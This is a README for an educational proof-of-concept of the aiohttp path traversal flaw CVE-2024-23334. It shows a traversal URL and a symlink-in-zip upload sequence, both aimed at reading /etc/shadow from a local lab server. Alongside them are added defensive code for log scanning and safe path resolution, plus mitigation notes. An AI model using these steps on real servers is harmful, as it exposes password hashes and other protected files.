brian-edgar-re/poc-cve-2024-23334

poc-cve-2024-23334

This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.

This was created for two reasons:

  1. Educational purposes: for those who are starting in application security, it is helpful to see the steps to reproduce a vulnerability as well as to understand the concepts behind it.
  2. Fixing steps: sharing mitigation steps in order to fix the issue.

For more information, visit my website: https://brianre.dev/

Requirements

  • Install Docker
  • Install Python3

How to run the project locally

  1. Clone this repo locally.
  2. Run the following command to build the image:
     make build
  3. Run the following command to run the container:
     make run

If you want to run Docker in detached mode, just run:

make rund

Scenarios

  1. Make a request with the URL modified to perform path traversal and exploit a Local File Inclusion (LFI) vulnerability. To execute the exploit, run the following script:
     python3 exploits/exploit_path_traversal.py

By running the script, we are performing a raw HTTP request to the server. We do it this way and not by using curl or accessing the URL directly in the browser because these tools sanitize and normalize URLs before sending the HTTP request. This includes path normalization: tools like curl and browsers will process the URL path, removing sequences like .. that are used for directory traversal. Therefore, a path like /static/../../../../../../../../../../../../etc/shadow will be normalized to /etc/shadow, and since such a path does not typically exist as a resource on a standard web server, it results in a 404 error.

  2. A symlink to a restricted file, such as /etc/shadow, has already been created on the server. This is the most improbable scenario, but someone inside the company could leak information this way, and people may not check the static access logs. And if static file access is not logged at all, it is very difficult to identify when the leak happened.

The scenario created in this repo was just for explaining the vulnerability and proving that it exists and is still exploitable.

  3. Someone can upload a symlink to the server and exploit it. This is a more realistic scenario: I upload a symlink generated on my computer and then access that file, so I can retrieve a file such as /etc/shadow.

The way to do this is with a compressed file, so that we are able to upload the symlink and, when it is uncompressed on the server, the same symlink is recreated there. Uploading a symlink directly through curl as a link.jpeg file will only read the local file that the symlink points to and upload that file instead. So, if we want to target a specific path on the server filesystem, we need to upload a compressed file, such as .zip or .tar.gz.

To reproduce this upload scenario, follow these steps:

touch /etc/shadow   # Creates a file at the specified path on your machine. Be sure that you don't replace an existing file.
ln -s /etc/shadow exploit.jpeg  # Creates a symlink to the /etc/shadow file and names it exploit.jpeg
zip -y images.zip exploit.jpeg  # Zips the symlink itself (-y stores the link instead of the file it points to)
curl -X POST -F "file=@images.zip" http://localhost:8080/upload # Uploads the zip file
curl -o shadow.txt http://localhost:8080/static/exploit.jpeg    # Accesses the symlink; because aiohttp has the vulnerability, it returns the server's /etc/shadow.
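Scenario 2 above notes that a leak through a planted symlink is hard to spot if static file access is not logged or not reviewed, and scenario 1 notes that curl and browsers collapse .. before sending, so a raw .. segment reaching the server is itself a signal that a hand-built client was used. The following is an added example, not part of this repository, of what a reviewer of the server's access log can pick out: traversal segments in the raw URL (plain, percent-encoded and double-encoded) and, as a heuristic for the symlink scenario, a static fetch by the same client shortly after a POST to the upload endpoint. The log lines are constructed in the shape of aiohttp's default access-log format, the 60-second upload-then-fetch window is an assumed heuristic, and /static and /upload are the routes used in the commands above.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines (not real traffic) laid out like aiohttp's default access log:
# client [time] "request line" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
172.17.0.1 [05/Mar/2024:10:00:01 +0000] "GET /static/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.17.0.1 [05/Mar/2024:10:00:07 +0000] "GET /static/../../../../../../etc/shadow HTTP/1.1" 200 1102 "-" "-"
172.17.0.1 [05/Mar/2024:10:00:09 +0000] "GET /static/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2310 "-" "-"
10.0.0.5 [05/Mar/2024:10:01:00 +0000] "GET /static/..%252f..%252fetc/hosts HTTP/1.1" 404 14 "-" "-"
10.0.0.9 [05/Mar/2024:10:02:00 +0000] "POST /upload HTTP/1.1" 200 2 "-" "curl/8.4.0"
10.0.0.9 [05/Mar/2024:10:02:03 +0000] "GET /static/exploit.jpeg HTTP/1.1" 200 1102 "-" "curl/8.4.0"
10.0.0.7 [05/Mar/2024:10:30:00 +0000] "GET /static/exploit.jpeg HTTP/1.1" 200 1102 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def has_traversal(path: str) -> bool:
    """True when the raw URL path carries a '..' segment, in plain, single- or
    double-percent-encoded form. Well-behaved clients collapse '..' before sending,
    so seeing one in a server log means the request line was built by hand."""
    decoded = path.split("?", 1)[0]
    for _ in range(2):          # unwind double encoding such as %252e -> %2e -> .
        decoded = unquote(decoded)
    return ".." in decoded.split("/")


def scan_access_log(
    log_text: str,
    static_prefix: str = "/static/",
    upload_path: str = "/upload",
    window: timedelta = timedelta(seconds=60),   # assumed heuristic window
) -> List[Dict[str, str]]:
    """Return one finding per suspicious request under the static route."""
    findings: List[Dict[str, str]] = []
    last_upload: Dict[str, datetime] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["time"], TIME_FMT)
        client, method, path, status = m["client"], m["method"], m["path"], m["status"]
        if method == "POST" and path == upload_path:
            last_upload[client] = when      # remember who uploaded, and when
            continue
        if not path.startswith(static_prefix):
            continue
        if has_traversal(path):
            findings.append({"client": client, "path": path, "status": status,
                             "reason": "traversal"})
        elif client in last_upload and when - last_upload[client] <= window:
            # A static fetch right after an upload by the same client is how the
            # zip-with-symlink scenario looks in the log; the URL alone is innocent.
            findings.append({"client": client, "path": path, "status": status,
                             "reason": "upload-then-fetch"})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The 404 line is still reported: the page explains that normalization turns such a request into a miss, but the attempt itself is what a defender wants to see. The last line, a fetch of exploit.jpeg by a client with no preceding upload, is not flagged, which is exactly the blind spot scenario 2 describes; closing it needs server-side controls, not log review.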

Mitigations

TODO
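This section is still a TODO in the repository. CVE-2024-23334 is the missing containment check in aiohttp's static route when follow_symlinks=True is set; upgrading aiohttp to 3.9.2 or later, and leaving follow_symlinks at its default of False, are the direct fixes for scenario 1. The planted-symlink scenarios 2 and 3 are not a bug in aiohttp but a consequence of letting symlinks be followed at all, so any static handler that must follow symlinks should also check where they lead. The following is an added example, not code from this repository or from aiohttp, of the resolver such a handler needs: it percent-decodes the request path, collapses .. lexically and refuses anything that leaves the root, then resolves symlinks and refuses those whose real target lies outside the root. It assumes Linux, receives the URL path after the /static route prefix has been stripped, and uses only the standard library; the directory layout in demo() is constructed in a temporary folder, with a throwaway file standing in for /etc/shadow.

```python
import os
import tempfile
from typing import Dict, Optional
from urllib.parse import unquote


def resolve_static_path(root: str, request_path: str) -> Optional[str]:
    """Map a raw URL path (route prefix already stripped) onto a file under root.

    Returns the real filesystem path to serve, or None when the request must be
    refused: either the URL escapes the root through '..' segments (the
    CVE-2024-23334 case) or a symlink inside the root points outside it
    (the planted-symlink scenarios).
    """
    root_real = os.path.realpath(root)

    # Decode percent-escapes before any check; "%2e%2e" is ".." to the filesystem.
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None

    # Lexical containment: collapse "." and ".." and require the result to stay
    # under the root. commonpath() avoids the /static vs /static2 prefix mistake.
    lexical = os.path.normpath(os.path.join(root_real, decoded.lstrip("/")))
    if os.path.commonpath([root_real, lexical]) != root_real:
        return None

    # Physical containment: resolve what the OS would actually open (following any
    # symlinks) and check again. This is the step that stops exploit.jpeg -> /etc/shadow.
    real = os.path.realpath(lexical)
    if os.path.commonpath([root_real, real]) != root_real:
        return None

    if not os.path.isfile(real):
        return None
    return real


def demo() -> Dict[str, bool]:
    """Build a constructed static root with a planted symlink and run the resolver
    over requests shaped like the scenarios above. Every value should be True."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "static")
        os.makedirs(root)
        with open(os.path.join(root, "logo.png"), "wb") as f:
            f.write(b"\x89PNG")
        # Sensitive file outside the static root; stands in for /etc/shadow.
        secret = os.path.join(tmp, "shadow")
        with open(secret, "w") as f:
            f.write("root:*:19000:0:99999:7:::\n")
        # Planted symlink, as left behind by the uploaded zip in scenario 3.
        os.symlink(secret, os.path.join(root, "exploit.jpeg"))

        return {
            "legit_file_served":    resolve_static_path(root, "/logo.png") is not None,
            "dotdot_inside_root_ok": resolve_static_path(root, "/css/../logo.png") is not None,
            "dotdot_refused":       resolve_static_path(root, "/../shadow") is None,
            "encoded_dotdot_refused": resolve_static_path(root, "/%2e%2e/shadow") is None,
            "symlink_refused":      resolve_static_path(root, "/exploit.jpeg") is None,
        }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The lexical check alone is what the aiohttp fix restores; the second, physical check is the stricter policy that also defeats scenarios 2 and 3 at the cost of not serving legitimately symlinked content outside the root. If that content is needed, the safer route is to place it inside the root (or bind-mount it there in the container) rather than to follow symlinks.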

Development

In order to set up the project locally for development, you have to:

  1. Create a virtual environment.
     python3 -m venv env
  2. Install dependencies.
     pip3 install -r requirements.txt
     pip3 install -r test-requirements.txt

Resources
